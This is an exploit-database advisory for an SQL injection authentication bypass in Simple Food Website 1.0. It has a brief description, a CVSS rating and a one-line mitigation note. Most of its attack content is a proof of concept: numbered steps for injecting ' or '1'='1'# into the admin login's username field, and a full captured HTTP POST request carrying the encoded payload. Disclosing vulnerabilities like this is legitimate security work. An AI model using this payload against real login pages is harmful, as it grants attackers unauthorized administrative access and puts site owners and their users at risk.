Simple Food Website 1.0 - Authentication Bypass

vendor:

Simple Food Website

by:

Viren Saroha (illusion)

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Simple Food Website

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:simple_food_website:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10/Kali Linux

2021

Simple Food Website 1.0 – Authentication Bypass

An authentication bypass vulnerability exists in Simple Food Website 1.0, which allows an attacker to gain access to the admin panel without valid credentials. This is due to the application not properly validating user input, allowing an attacker to inject malicious SQL code into the username field. By entering ' or '1'='1'# in the username field, an attacker can bypass authentication and gain access to the admin panel.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Simple Food Website 1.0 - Authentication Bypass
# Date: 2021-04-03
# Exploit Author: Viren Saroha (illusion)
# Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

POC

Step 1 -  Go to url http://localhost/food/admin/login.php
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in burpsuite
Step 4 – Change the username to ' or '1'='1'#
Step 5 – Click forward and now you will be logged in as admin.


REQUEST


POST /food/admin/process_login.php HTTP/1.1
Host: 192.168.132.128
Content-Length: 76
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.132.128
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.132.128/food/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=44189551c332ee92a95246aac0756dd3
Connection: close

username=%27+or+%271%27%3D%271%27%23&password=randomPassword&Sign+In=Sign+In